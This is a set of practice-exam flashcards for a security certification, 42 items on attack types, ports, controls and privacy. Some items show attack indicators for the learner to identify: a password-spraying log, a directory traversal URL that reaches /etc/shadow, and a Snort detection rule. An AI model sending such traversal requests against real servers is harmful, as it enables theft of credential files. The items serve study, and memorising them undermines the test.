Practice Exam 01 Flashcards

1
Q

A cybersecurity analyst is reviewing the logs of an authentication server and sees the following output:

[443] [https-get-form] host: diontraining.com login: admin password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: admin password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: root password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: root password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: dion password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: dion password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: json password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: json password: C0mpT1@P@$$w0rd

What type of attack was most likely being attempted by the attacker?

a. Session hijacking
b. Impersonation
c. Password spraying
d. Credential stuffing

A

c. Password spraying

OBJ-1.2: Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. We can use multiple iterations using a number of different passwords, but the number of passwords attempted is usually low when compared to the number of users attempted. This method avoids password lockouts, and it is often more effective at uncovering weak passwords than targeting specific users. In the scenario provided, there are only one or two attempts being made to each username listed. This is indicative of a password spraying attack instead of a brute force attempt against a single user. Impersonation is the act of pretending to be another person for the purpose of fraud. Credential stuffing is the automated injection of breached username/password pairs in order to fraudulently gain access to user accounts. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account, which the attacker can then hijack for their own purposes. Session hijacking is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.

2
Q

Which of the following is the leading cause for cross-site scripting, SQL injection, and XML injection attacks?

a. Faulty input validation
b. Directory traversals
c. Output encoding
d. File inclusions

A

a. Faulty input validation

OBJ-3.2: A primary vector for attacking applications is to exploit faulty input validation. The input could include user data entered into a form or URL, passed by another application or link. This is heavily exploited by cross-site scripting, SQL injection, and XML injection attacks. Directory traversal is the practice of accessing a file from a location that the user is unauthorized to access. The attacker does this by ordering an application to backtrack through the directory path so that the application reads or executes a file in a parent directory. In a file inclusion attack, the attacker adds a file to the running process of a web app or website. The file is either constructed to be malicious or manipulated to serve the attacker’s malicious purposes. Cross-site scripting (XSS) is one of the most powerful input validation exploits. XSS involves a trusted site, a client browsing the trusted site, and the attacker’s site.

3
Q

Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization’s database?

a. SQL injection
b. Buffer overflow
c. Cross-site scripting
d. Denial of service

A

a. SQL injection

OBJ-1.3: A SQL injection poses the most direct and most impactful threat to an organization’s database. A SQL injection could allow the attacker to execute remote commands on the database server and lead to the disclosure of sensitive information. A buffer overflow attack attempts to overwrite the memory buffer in order to send additional data into adjacent memory locations. A buffer overflow attack might target a database server, but it isn’t intended to cause a disclosure of information directly. Instead, a buffer overflow attack may be used to gain initial access to a server and allow for the running of other malicious code. A denial of service targets the availability of the information by attempting to take the server offline. A cross-site scripting attack typically is focused against the user, not the server or database.

4
Q

You have finished running an nmap scan on a server and see the following output:

nmap diontraining.com

Starting Nmap (http://nmap.org)
Nmap scan report for diontraining.com (64.13.134.52)
Not shown: 996 filtered ports

PORT STATE
22/tcp open
23/tcp open
53/tcp open
443/tcp open

Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds

Based on the output above, which of the following ports listed as open represents the most significant security vulnerability to your network?

a. 22
b. 53
c. 443
d. 23

A

d. 23

OBJ-3.1: Port 23 is used by telnet and is not considered secure because it sends all of its data in cleartext, including authentication data like usernames and passwords. As an analyst, you should recommend that telnet is disabled and blocked from use. The other ports that are open are for SSH (port 22), DNS (port 53), and HTTPS (port 443).

5
Q

Which type of authentication method is commonly used with physical access control systems and relies upon RFID devices embedded into a token?

a. HOTP
b. Proximity cards
c. TOTP
d. Smart cards

A

b. Proximity cards

OBJ-2.7: A proximity card is a contactless card that usually utilizes RFID to communicate with the reader on a physical access system. These are commonly used to access secured rooms (such as server rooms) or even a building itself (such as at a mantrap). Some smart cards contain proximity cards within them as well, but the best answer to this question is proximity cards, since that is the function of the smart card that would be used to meet the requirements of this scenario.

6
Q

Review the following packet captured at your NIDS:

23:12:23.154234 IP 86.18.10.3:54326 > 71.168.10.45:3389
Flags [P.], seq 1834:1245, ack 1, win 511, options [nop,nop,TS val 263451334 ecr 482862734], length 125

After reviewing the packet above, you discovered there is an unauthorized service running on the host. Which of the following ACL entries should be implemented to prevent further access to the unauthorized service while maintaining full access to the approved services running on this host?

a. DENY IP HOST 86.18.10.3 EQ 3389
b. DENY IP HOST 71.168.10.45 ANY EQ 25
c. DENY TCP ANY HOST 71.168.10.45 EQ 3389
d. DENY TCP ANY HOST 86.18.10.3 EQ 25

A

c. DENY TCP ANY HOST 71.168.10.45 EQ 3389

OBJ-4.4: Since the question asks you to prevent access to the unauthorized service, we need to block port 3389 from accepting connections on 71.168.10.45 (the host). This option will deny ANY workstation from connecting to this machine (host) over the Remote Desktop Protocol service that is unauthorized (port 3389).

7
Q

Your company just installed a new webserver within your DMZ. You have been asked to open up the port for secure web browsing on the firewall. Which port should you set as open to allow users to access this new server?

a. 80
b. 443
c. 143
d. 21

A

b. 443

OBJ-3.1: Port 443 is used for HTTPS traffic. Therefore, this port must be opened. This is secure web browsing over SSL or TLS. Port 21 is used for the File Transfer Protocol (FTP). Port 80 is used for unsecured web browsing (HTTP). Port 143 is used for Internet Mail Application Protocol (IMAP).

8
Q

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of attack has likely occurred?

a. Directory traversal
b. Buffer overflow
c. SQL injection
d. XML injection

A

a. Directory traversal

OBJ-1.3: This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise the logic of an XML application or service. SQL injection is the placement of malicious code in SQL statements, via web page input.

9
Q

Which of the following type of digital forensic investigations is most challenging due to the on-demand nature of the assets being analyzed?

a. On-premise servers
b. Mobile devices
c. Cloud services
d. Employee workstations

A

c. Cloud services

OBJ-4.5: The on-demand nature of cloud services means that instances are often created and destroyed again, with no real opportunity for forensic recovery of any data. Cloud providers can mitigate this to some extent by using extensive logging and monitoring options. A CSP might also provide an option to generate file system and memory snapshots from containers and VMs in response to an alert condition generated by a SIEM. Employee workstations are often the easiest to conduct forensics on since they are a single-user environment for the most part. Mobile devices have some unique challenges due to their operating systems, but there are good forensic tool suites available to ease the forensic acquisition and analysis of mobile devices. On-premise servers are more challenging than a workstation to analyze, but they do not suffer from the same issues as cloud-based services and servers.

10
Q

When your credit card data is written to the customer invoicing system at Dion Training, the first 12 digits are replaced with an x before storing the data. Which of the following privacy methods is being used?

a. Data minimization
b. Data masking
c. Anonymization
d. Tokenization

A

b. Data masking

OBJ-5.5: Data masking can mean that all or part of the contents of a field is redacted, by substituting all character strings with x, for example. Tokenization means that all or part of data in a field is replaced with a randomly generated token. The token is stored with the original value on a token server or token vault, separate from the production database. An authorized query or app can retrieve the original value from the vault, if necessary, so tokenization is a reversible technique. Data minimization involves limiting data collection to only what is required to fulfill a specific purpose. By reducing what information is collected, it reduces the amount and type of information that must be protected. Data anonymization is the process of removing personally identifiable information from a data set so that the people whom the data describe remain anonymous.

11
Q

(Sample Simulation – On the real exam for this type of question, you would receive 3-5 pictures and be asked to drag and drop them into place next to the correct term.)

(a person holding a mobile phone texting)

Which of the following types of attacks occurs when an attacker sends unsolicited messages over Facebook messenger?

a. Spear phishing
b. Spamming
c. Pharming
d. Phishing
e. Spimming

A

e. Spimming

OBJ-1.1: Spim is a type of spam targeting users of instant messaging (IM) services, SMS, or private messages within websites and social media. If the unsolicited messages were sent by email, they would have instead been classified as Spam.

12
Q

You have been asked to write a new security policy to reduce the risk of employees working together to steal information from the Dion Training corporate network. Which of the following policies should you create to counter this threat?

a. Privacy policy
b. Least privilege policy
c. Mandatory vacation policy
d. Acceptable user policy

A

c. Mandatory vacation policy

OBJ-5.3: A mandatory vacation policy requires that all users take time away from work to enjoy a break from the day-to-day routine of their jobs. But there is a major side benefit to mandatory vacations in regard to your company’s security posture. By requiring mandatory vacations, the company must have another employee fill in for the vacationing employee’s normal roles and responsibilities. By doing this, the employee who is filling in might come across fraud, abuse, or theft that the vacationing employee is a part of. The concept of least privilege may not stop this theft from occurring, since two employees could work together to steal information that each of them has access to as part of their job. Also, acceptable use simply outlines the types of activities that are allowed and not allowed; it won’t prevent theft from occurring. A privacy policy discusses how information should be properly stored and secured, but this won’t stop an employee from stealing information or detect if the information was stolen.

13
Q

(Sample Simulation – On the real exam for this type of question, you would have to rearrange the ports into the proper order by dragging and dropping them into place.)

  1. RDP
  2. L2TP
  3. LDAP
  4. Kerberos

1701
3389
88
389

Using the image provided, place the port numbers in the correct order with their associated protocols:

a. 3389, 1701, 389, 88
b. 88, 389, 3389, 1701
c. 1701, 3389, 88, 389
d. 389, 88, 1701, 3389

A

a. 3389, 1701, 389, 88

OBJ-3.1: For the exam, you need to know your ports and protocols. The Remote Desktop Protocol (RDP) operates over port 3389. Layer 2 Tunneling Protocol (L2TP) operates over port 1701. The Lightweight Directory Access Protocol (LDAP) operates over port 389. Kerberos operates over port 88.

14
Q

Your company just launched a new invoicing website for use by your five largest vendors. You are the cybersecurity analyst and have been receiving numerous phone calls that the webpage is timing out, and the website overall is performing slowly. You have noticed that the website received three million requests in just 24 hours, and the service has now become unavailable for use. What do you recommend should be implemented to restore and maintain the availability of the new invoicing system?

a. VPN
b. MAC filtering
c. Intrusion Detection System
d. Whitelisting

A

d. Whitelisting

OBJ-3.2: By implementing whitelisting of the authorized IP addresses for the five largest vendors, they will be the only ones who will be able to access the webserver. This can be done by creating rules in the Access Control List (ACL) to deny ALL other users except these five vendors, thereby dropping a large number of requests from any other IP addresses, such as those from an attacker. Based on the description in the scenario, it appears that the system is under some form of denial of service attack, but by implementing a whitelist at the edge of the network and blackholing any traffic from IP addresses that are not whitelisted, the server will no longer be overwhelmed or perform slowly when responding to legitimate requests. MAC filtering is only applicable at layer 2 of the OSI model (which would not work for traffic being sent over the internet from your vendors to your server). A VPN is a reasonable solution to help secure the connection between the vendors and your systems, but it will not deal with the DoS condition being experienced. An intrusion detection system may detect the DoS condition, but an IDS cannot resolve the condition (whereas an IPS could).

15
Q

Dion Training’s offices utilize an open concept floor plan. They are concerned that a visitor might attempt to steal an external hard drive and carry it out of the building. To mitigate this risk, the security department has recommended installing security cameras that are clearly visible to both employees and visitors. What type of security control do these cameras represent?

a. Compensating
b. Administrative
c. Deterrent
d. Corrective

A

c. Deterrent

OBJ-2.7: A deterrent control is designed to discourage the violation of a security policy. Since the cameras are clearly visible, they are acting as a deterrent control. A corrective control is one that is used to fix or eliminate a vulnerability. A compensating control is used to minimize a vulnerability when it is deemed too difficult or impractical to fully correct the vulnerability. An administrative control is used to create a policy or procedure to minimize or eliminate a vulnerability.

16
Q

Nicole’s organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role?

a. PaaS
b. MSSP
c. SaaS
d. IaaS

A

b. MSSP

OBJ-2.2: A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings. Security as a service or a managed service provider (MSP) would be better suited for this role. This question may seem beyond the scope of the exam, but the objectives allow for “other examples of technologies, processes, or tasks pertaining to each objective may also be included on the exam although not listed or covered” in the bulletized lists of the objectives. The exam tests the equivalent to 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of all the content of this examination. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!

17
Q

Dion Training has a $15,000 server that has been crashing frequently. Over the past 12 months, the server has crashed 10 times, requiring the server to be rebooted in order to recover from the crash. Each time, this has resulted in a 5% loss of functionality or data. Based on this information, what is the Annual Loss Expectancy (ALE) for this server?

a. $1,500
b. $15,000
c. $7,500
d. $2,500

A

c. $7,500

OBJ-5.4: To calculate the ALE, you need to multiply the Single Loss Expectancy (SLE) by the Annual Rate of Occurrence (ARO). The SLE is calculated by multiplying the Exposure Factor (EF) by the Asset Value (AV). Therefore, SLE = EF x AV, and ALE = SLE x ARO. For this scenario, the asset value is $15,000, the annual rate of occurrence is 10 times per year, and the exposure factor is 5% (or 0.05). To calculate the SLE, SLE = 0.05 x $15,000 = $750. Therefore, the ALE = SLE x ARO = $750 x 10 = $7,500.

18
Q

Marta’s organization is concerned that a user’s account could remain vulnerable for an extended period of time if their password was compromised. Which of the following controls should be configured as part of their password policy to minimize this vulnerability?

a. Minimum password length
b. Password complexity
c. Password expiration
d. Password history

A

c. Password expiration

OBJ-3.7: A password expiration control in the policy would force users to change their password at specific intervals of time. This will then lock out a user who types in the incorrect password or create an alert that the user’s account has been potentially compromised. While the other options are good components of password security to prevent an overall compromise, they are not effective against the vulnerability described in this particular scenario, as it states the issue is based on time. Password history is used to determine the number of unique passwords a user must use before they can use an old password again. The “Passwords must meet complexity requirements” policy setting determines whether passwords must meet a series of guidelines that are considered important for a strong password. Maximum password length creates a limit to how long the password can be, but a longer password is considered stronger against a brute force attack.

19
Q

As a cybersecurity analyst conducting vulnerability scans, you have just completed your first scan of an enterprise network comprising over 10,000 workstations. As you examine your findings, you note that you have less than 1 critical finding per 100 workstations. Which of the following statements BEST explains these results?

a. The scanner was not compatible with the devices on your network
b. The network has an exceptionally strong security posture
c. An uncredentialed scan of the network was performed
d. The scanner failed to connect with the majority of workstations.

A

c. An uncredentialed scan of the network was performed

OBJ-1.7: Uncredentialed scans are generally unable to detect many vulnerabilities on a device. When conducting an internal assessment, you should perform an authenticated (credentialed) scan of the environment to most accurately determine the vulnerability posture of the network. In most enterprise networks, if a vulnerability exists on one machine, it also exists on most of the other workstations since they use a common baseline or image. If the scanner failed to connect to the workstations, an error would have been generated in the report.

20
Q

Maria is trying to log in to her company’s webmail and is asked to enter her username and password. Which type of authentication method is Maria using?

a. RADIUS
b. Multifactor
c. TACACS+
d. Single-factor

A

d. Single-factor

OBJ-2.4: Single-factor authentication (SFA) is a process for securing access to a given system, such as a network or website, that identifies the party requesting access through only one category of credentials (something you know, something you have, something you are, or something you do). The most common example of single-factor authentication occurs when a user is prompted to enter their username and password in order to authenticate.

21
Q

You work for a bank that is interested in moving some of its operations to the cloud, but it is worried about security. You recently discovered an organization called CloudBank that was formed by 15 local banks as a way for them to build a secure cloud-based environment that can be accessed by the 15 member banks. Which cloud model BEST describes the cloud created by CloudBank?

a. Public cloud
b. Hybrid cloud
c. Private cloud
d. Community cloud

A

d. Community cloud

OBJ-2.2: Community cloud is another type of cloud computing in which the setup of the cloud is shared mutually among different organizations that belong to the same community or area. A multi-tenant setup is developed using the cloud among different organizations that belong to a particular community or group having similar computing concerns. For joint business organizations, ventures, research organizations, and tenders, a community cloud is an appropriate solution. Based on the description of 15 member banks coming together to create the CloudBank organization and its cloud computing environment, a community cloud model is most likely being described.

22
Q

What role does the red team perform during a tabletop exercise (TTX)?

a. Network defender
b. Cybersecurity analyst
c. System administrator
d. Adversary

A

d. Adversary

OBJ-4.2: The red team acts as the adversary, attempting to penetrate the network or exploit the network as a rogue internal attacker. The red team might be selected members of in-house security staff or might be a third-party company or consultant contracted to perform the role. The blue team operates the security system with a focus on detecting and repelling the red team. The blue team usually consists of system administrators, cybersecurity analysts, and network defenders.

23
Q

Chris just downloaded a new third-party email client for his smartphone. When Chris attempts to log in to his email with his username and password, the email client generates an error message stating that “Invalid credentials” were entered. Chris assumes he must have forgotten his password, so he resets his email’s username and password and then reenters them into the email client. Again, Chris receives an “Invalid credentials” error. What is MOST likely causing the “Invalid credentials” error in regard to Chris’s email client?

a. His smartphone has full device encryption enabled
b. His email account requires a strong password to be used
c. His email account requires multifactor authentication
d. His email account is locked out

A

c. His email account requires multifactor authentication

OBJ-2.4: If a user or system has configured their email accounts to require two-factor authentication (2FA) or multifactor authentication, then even if they enter their username and password correctly in the third-party email client, they will receive the “Invalid credentials” error message. Some email servers will allow the user to create an Application Specific Password to bypass the multifactor authentication requirement to overcome this, or the user will have to use an email client that supports multifactor authentication.

24
Q

Which of the following is not normally part of an endpoint security suite?

a. VPN
b. Software firewall
c. Anti-virus
d. IPS

A

a. VPN

OBJ-3.2: Endpoint security includes software host-based firewalls, host-based intrusion protection systems (HIPS), and anti-virus software. A VPN is not typically considered an endpoint security tool because it is a network security tool.

25
Q

Which of the following items represents a document that includes detailed information on when an incident was detected, how impactful the incident was, how it was remediated, the effectiveness of the incident response, and any identified gaps that might require improvement?

a. Chain of custody report
b. Forensic analysis report
c. Lessons learned report
d. Trends analysis report

A

c. Lessons learned report

OBJ-4.2: The lessons learned report provides you with the details of the incident, its severity, the remediation method, and, most importantly, how effective your response was. Additionally, it provides recommendations for improvements in the future. A forensic analysis report would not provide recommendations for future improvements, even though it provides many of the other details. A trend analysis report describes whether behaviors have increased, decreased, or stayed the same over time. A chain of custody report is the chronological documentation or paper trail that records the sequence of custody, control, transfer, analysis, and disposition of physical or electronic evidence.

26
Q

Your company explicitly obtains permission from its customers to use their email address as an account identifier in its CRM. Max, who works at the marketing department in the company’s German headquarters, just emailed all of the customers to let them know about a new sales promotion this weekend. Which of the following privacy violations has occurred, if any?

a. There was a privacy violation since data minimization policies were not followed properly
b. There was a privacy violation since the customers explicitly gave permission to use the email address as an identifier and did not consent to receiving marketing emails.
c. There was no privacy violation since the customers were emailed securely through the customer relationship management tool
d. There was no privacy violation because only corporate employees had access to their email addresses.

A

b. There was a privacy violation since the customers explicitly gave permission to use the email address as an identifier and did not consent to receiving marketing emails.

OBJ-5.2: According to the European Union’s General Data Protection Regulation (GDPR), personal data collected can only be used for the exact purpose for which explicit consent was obtained. In order to use email addresses for marketing purposes, a separate explicit consent should have been obtained. Since the company operates in Germany, it must follow the GDPR privacy standard. Even if a company doesn’t operate within the European Union, its customers might be European Union citizens, and therefore the company should still optionally follow the GDPR guidelines. While data minimization is a good internal policy to utilize, not following it doesn’t equate to a privacy violation or breach. Data minimization is the principle that data should only be processed and stored if that is necessary to perform the purpose for which it is collected. The option concerning the customer relationship management (CRM) tool is a distractor since the issue is the use of the data in ways that were not consented to by the customer, not which system the email was actually sent through. A privacy violation can occur when data is viewed by corporate employees if those employees do not have a need to know, a valid business requirement to use the data, or consent from the customer to use the data for the specific purpose (as was the case in this scenario).

27
Q

Which of the following cryptographic algorithms is classified as asymmetric?

a. 3DES
b. AES
c. RC4
d. PGP

A

d. PGP

OBJ-2.8: Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication. PGP is used for signing, encrypting, and decrypting texts, emails, files, directories, and whole disk partitions and to increase the security of email communications. PGP is a public-key cryptosystem and relies on an asymmetric algorithm. AES, RC4, and 3DES are all symmetric algorithms.

28
Q

You are reviewing a rule within your organization’s IDS. You see the following output:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt";
flow:to_client,established;
file_data;
content:"recordset"; offset:14; depth:9;
content:".CacheSize"; distance:0; within:100;
pcre:"/CacheSize\s=\s/";
byte_test:10,>,0xffffffe,0,relative,string;
max-detect-ips drop, service http;
reference:cve,2016-8077;
classtype:attempted-user;
sid:65535; rev:1;)

Based on this rule, which of the following malicious packets would this IDS alert on?

a. Any malicious inbound packets
b. A malicious inbound TCP packet
c. Any malicious outbound packets
d. A malicious outbound TCP packet

A

b. A malicious inbound TCP packet

OBJ-3.3: The rule header is set to alert only on TCP packets based on the first line of this IDS rule. The flow condition is set as “to_client, established”, which means that only inbound traffic will be analyzed against this rule, and only inbound traffic for connections that are already established. Therefore, this rule will alert on an inbound malicious TCP packet only when the packet matches all the conditions listed in this rule. This rule is an example of a Snort IDS rule. For the exam, you do not need to be able to create your own IDS rules, but you should be able to read them and pick out generic content like the type of protocol covered by the signature, the port being analyzed, and the direction of flow.

29
Q

What is a reverse proxy commonly used for?

a. Allowing access to a virtual private cloud
b. Directing traffic to internal services if the contents of the traffic comply with the policy
c. To prevent the unauthorized use of cloud services from the local network
d. To obfuscate the origin of a user within a network

A

b. Directing traffic to internal services if the contents of the traffic comply with the policy

OBJ-2.1: A reverse proxy is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with the policy. This does not require the configuration of the users’ devices. This approach is only possible if the cloud application has proxy support. You can deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet. The proxy then creates the appropriate request to the internal server on the corporate network and passes the response from the server back to the external client. They are not generally intended to obfuscate the source of communication, nor are they necessarily specific to the cloud. A cloud access security broker (CASB) can be used to prevent unauthorized use of cloud services from the local network.

30
Q

You have signed up for a web-based appointment scheduling application to help you manage your new IT technical support business. What type of solution would this be categorized as?

a. PaaS
b. DaaS
c. IaaS
d. SaaS

A

d. SaaS

OBJ-2.2: Software as a Service (SaaS) is used to provide web applications to end-users. This can be a calendar, scheduling, invoicing, word processor, database, or other program. For example, Google Docs and Office 365 are both word processing SaaS solutions. QuickBooks Online is one example of a SaaS solution for accounting.

31
Q

(Sample Simulation – On the real exam for this type of question, you would receive 3-5 pictures and be asked to drag and drop them into place next to the correct term.)

A picture of someone holding a mobile phone with fingerprint authentication

How would you appropriately categorize the authentication method being displayed here?

a. Multifactor authentication
b. PAP authentication
c. One-time password authentication
d. Biometric authentication

A

d. Biometric authentication

OBJ-2.4: For the exam, you need to know the different categories of authentication and what type of authentication methods belong to each category. A fingerprint scan would be categorized as biometric authentication. Biometric authentications include any authentication system that relies on one or more physical characteristics of a person for authentication.

32
Q

Which of the following authentication mechanisms involves receiving a one-time use shared secret password, usually through a token-based key fob or smartphone app, that automatically expires after a short period of time (for example, 60 seconds)?

a. Smart card
b. TOTP
c. EAP
d. HOTP

A

b. TOTP

OBJ-2.4: The Time-based One-time Password Algorithm (TOTP) is a refinement of the HOTP. One issue with HOTP is that tokens can be allowed to persist unexpired, raising the risk that an attacker might be able to obtain one and decrypt data in the future. In TOTP, the HMAC is built from the shared secret plus a value derived from the device’s and server’s local timestamps. TOTP automatically expires each token after a short window (60 seconds, for instance).

33
Q

Which analysis framework makes no allowance for an adversary retreat in its analysis?

a. Diamond Model of Intrusion Analysis
b. MITRE ATT&CK framework
c. Lockheed Martin cyber kill chain
d. AlienVault (AT&T Cybersecurity) Cyber Kill Chain

A

c. Lockheed Martin cyber kill chain

OBJ-4.2: The Lockheed Martin cyber kill chain implicitly assumes a unidirectional workflow. Therefore, it fails to consider that an adversary may retreat during an attack. MITRE and Diamond’s models are more dynamic systems that allow for a broader range of adversary behaviors. AlienVault was specifically designed to avoid the rigidity of the Lockheed Martin cyber kill chain.

34
Q

What technique is most effective in determining whether or not increasing end-user security training would be beneficial to the organization during your technical assessment of their network?

a. Vulnerability scanning
b. Network sniffing
c. Social engineering
d. Application security testing

A

c. Social engineering

OBJ-5.3: Social engineering refers to the psychological manipulation of people into performing actions or divulging confidential information. During your technical assessment, utilizing social engineering techniques such as phishing or pharming can help you determine if additional end-user security training should be included in the organization. The other three options focus solely on technical controls. Therefore, adding end-user training would have no effect on these technology options.

35
Q

Dion Training is building a new data center. The group designing the facility has decided to provide additional HVAC capacity to ensure the data center maintains a consistently low temperature. Which of the following is the most likely benefit that will be achieved by increasing the designed HVAC capacity?

a. Longer UPS run time due to increased airflow
b. Higher data integrity due to more efficient SSD cooling
c. Increase the availability of network services due to higher throughput
d. Longer MTBF of hardware due to lower operating temperatures.

A

d. Longer MTBF of hardware due to lower operating temperatures.

OBJ-5.4: The mean time between failure (MTBF) is the measure of the anticipated rate of failure for a system or component. This is effectively a measurement of the component’s expected lifespan. If the HVAC capacity is increased, the server room can maintain a cooler temperature range. Datacenters produce a lot of heat from the equipment being operated. Excessive heat can damage components and cause premature hardware failure. Therefore, increasing the HVAC capacity and airflow can lead to longer lifespans for servers and networking equipment.

36
Q

An employee contacts the service desk because they are unable to open an attachment they receive in their email. The service desk agent conducts a screen sharing session with the user and investigates the issue. The agent notices that the attached file is named Invoice1043.pdf, and a black pop-up window appears and then disappears quickly when the attachment was double-clicked. Which of the following is most likely causing this issue?

a. The file contains an embedded link to a malicious website
b. The attachment is using a double file extension to mask its identity
c. The user doesn’t have a PDF reader installed on their computer
d. The email is a form of spam and should be deleted.

A

b. The attachment is using a double file extension to mask its identity

OBJ-1.1: The message contains a file attachment in the hope that the user will execute or open it. The nature of the attachment might be disguised by formatting tricks such as using a double file extension, such as Invoice1043.pdf.exe, where the user only sees the first extension since .exe is a known file type in Windows. This would explain the black pop-up window that appeared and then disappeared, especially if the exe file was running a command-line tool. This file is most likely not a PDF, so there is no need for a PDF reader. Additionally, most modern web browsers, such as Chrome and Edge, can open PDF files by default for the user. The file would not contain an embedded link since an embedded link is another popular attack vector that embeds a link to a malicious site within the email body, not within the file. This email is likely not spam and would be better categorized as a phishing attempt instead.

37
Q

If you are unable to ping a target because you are receiving no response or a response that states the destination is unreachable, then ICMP may be disabled on the remote end. If you wanted to try to elicit a response from a host using TCP, what tool would you use?

a. Traceroute
b. TCP ping
c. Broadcast ping
d. Hping

A

d. Hping

OBJ-4.1: Hping is a handy little utility that assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. Hping is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rule sets. It is also great for learning more about TCP/IP and experimenting with IP protocols. Hping does not support IPv6, though, so the creators of NMAP have created Nping to fill this gap and serve as an updated variant of Hping. Traceroute and tracert are computer network diagnostic commands for displaying the route and measuring transit delays of packets across an Internet Protocol network. Traceroute uses ICMP and not TCP. Broadcast ping is simply pinging the broadcast IP of the subnet using the ping command, but if a regular ping does not work, neither will a broadcast ping. Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies. This is used as a covert channel, not as a method of eliciting a response from a host using TCP.

38
Q

Which party in a federation provides services to members of the federation?

a. SSO
b. RP
c. SAML
d. IdP

A

b. RP

OBJ-2.4: Relying parties (RPs) provide services to members of a federation. An identity provider (IdP) provides identities, makes assertions about those identities, and releases information about the identity holders. The Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties, typically between an identity provider and a service provider (SP) or relying party (RP). Single sign-on (SSO) is an authentication scheme that allows a user to log in with a single ID and password to any of several related yet independent software systems across a federation. SAML and SSO are not parties. Therefore, they cannot possibly be the right answer to this question.

39
Q

James, a programmer at Apple Computers, is surfing the internet on his lunch break. He comes across a rumor site that is focused on providing details of the upcoming iPhone being released in a few months. James knows that Apple likes to keep its product details a secret until it is publicly announced. As James is looking over the website, he sees a blog post with an embedded picture of a PDF containing detailed specifications for the next iPhone and labeled as “Proprietary Information – Internal Use Only.” The new iPhone is still several months away from release. What should James do next?

a. Contact his team lead and ask what he should do next
b. Contact the service desk or incident response team to determine what to do next
c. Reply to the blog post and deny the accuracy of the specifications
d. Contact the website’s owner and request they take down the PDF

A

b. Contact the service desk or incident response team to determine what to do next

OBJ-5.5: This is an example of either a data leak or a data breach. James is not sure how the website got the details of the product’s specifications. Therefore, he should follow his organizational procedures for notification that internal company information has been leaked to the internet. In most organizations, the service desk acts as the single point of contact for all IT issues (even possible data breaches), and they can refer James to the incident response team (if one is currently stood up). Since James works as a programmer, it is unlikely that his team lead is responsible for handling a data leak or data breach, so it is better to contact the service desk first. James should not contact the website directly nor reply to the blog post. Instead, he should leave the response actions to the security team and the incident response team.

40
Q

Which of the following is the LEAST secure wireless security and encryption protocol?

a. WPA
b. WPA2
c. AES
d. WEP

A

d. WEP

OBJ-3.4: Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. It is the oldest form of wireless security and the weakest form. WEP can be cracked with brute force techniques in less than 5 minutes with a normal end-user computer.

41
Q

What is the utilization of insights gained from threat research and threat modeling to proactively discover evidence of adversarial TTPs within a network or system called?

a. Incident response
b. Threat hunting
c. Information assurance
d. Penetration testing

A

b. Threat hunting

OBJ-1.7: Threat hunting is the utilization of insights gained from threat research and threat modeling to proactively discover evidence of adversarial TTPs within a network or system. Penetration testing uses active tools and security utilities to evaluate security by simulating an attack on a system. A penetration test verifies that a threat exists, then actively tests and bypasses security controls, and finally exploits vulnerabilities on the system. Information assurance (IA) is the practice of assuring information and managing risks related to the use, processing, storage, and transmission of information or data and the systems and processes used for those purposes. Incident response is an organized approach to addressing and managing the aftermath of a security breach or cyberattack, also known as an IT incident, computer incident, or security incident. The goal is to handle the situation in a way that limits damage and reduces recovery time and costs.

42
Q

Which type of personnel control is being implemented if Kirsten must receive and inventory any items that her coworker, Bob, orders?

a. Mandatory vacation
b. Separation of duties
c. Dual control
d. Background checks

A

b. Separation of duties

OBJ-5.3: This organization is using separation of duties to ensure that neither Kirsten nor Bob can exploit the organization’s ordering processes for their own individual gain. Separation of duties is the concept of having more than one person required to complete a particular task to prevent fraud and error. Dual control, instead, requires both people to perform the action together. For example, a nuclear missile system uses dual control and requires two people to each turn a different key simultaneously to allow for a missile launch to occur. Mandatory vacation policies require employees to take time away from their job and help to detect fraud or malicious activities. A background check is a process a person or company uses to verify that a person is who they claim to be, and provides an opportunity for someone to check a person’s criminal record, education, employment history, and other activities that happened in the past in order to confirm their validity.

43
Q

